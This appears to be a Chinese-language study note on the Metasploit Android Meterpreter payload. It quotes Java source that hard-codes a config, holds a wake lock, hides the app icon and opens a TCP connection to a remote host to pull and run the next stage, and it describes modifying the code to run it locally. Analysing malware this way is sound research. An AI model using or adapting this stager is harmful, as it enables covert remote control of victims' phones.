Untitled
想要在本地运行,配置文件需要写到 configBytes 列表里面,因为这个配置列表我不知道是怎么生成的,看注释里面好像是 metasploit-framework/lib/rex/payloads/meterpreter/config.rb 文件 所以这部分直接跳过加密解密配置部分,稍微魔改一下
这里会走入 if 分支,所以我们在这里魔改
硬编码的exploit配置
private static final byte [] configBytes = new byte[] { (byte) 0xde, (byte) 0xad, (byte) 0xba, (byte) 0xad, //placeholder /*8192 bytes */ 0, 0, 0, 0, 0,...
};
...
Config config = ConfigParser.parseConfig(configBytes);
-
确保手机的CPU保持运转
PowerManager powerManager = (PowerManager) context.getSystemService(Context.POWER_SERVICE);
// PARTIAL_WAKE_LOCK使得CPU在屏幕和键盘不工作的情况下仍保持运转
wakeLock = powerManager.newWakeLock(PowerManager.PARTIAL_WAKE_LOCK, Payload.class.getSimpleName()); wakeLock.acquire(); -
按需隐藏应用图标
if ((config.flags & Config.FLAG_HIDE_APP_ICON) != 0) { hideAppIcon();
} -
打开一个与远程服务器连接的socket
/*
private static void runStageFromHTTP(String url) throws Exception {
// 参数url是从恶意应用的硬编码配置中读取的
}
*/
private static void runStagefromTCP(String url) throws Exception {
// string is in the format: tcp://host:port
String[] parts = url.split(":");
int port = Integer.parseInt(parts[2]);
String host = parts[1].split("/")[2];
Socket sock = null;
if (host.equals("")) {
ServerSocket server = new ServerSocket(port);
sock = server.accept();
server.close();
} else {
sock = new Socket(host, port);
}
if (sock != null) {
DataInputStream in = new DataInputStream(sock.getInputStream());
OutputStream out = new DataOutputStream(sock.getOutputStream());
runNextStage(in, out, parameters);
}
}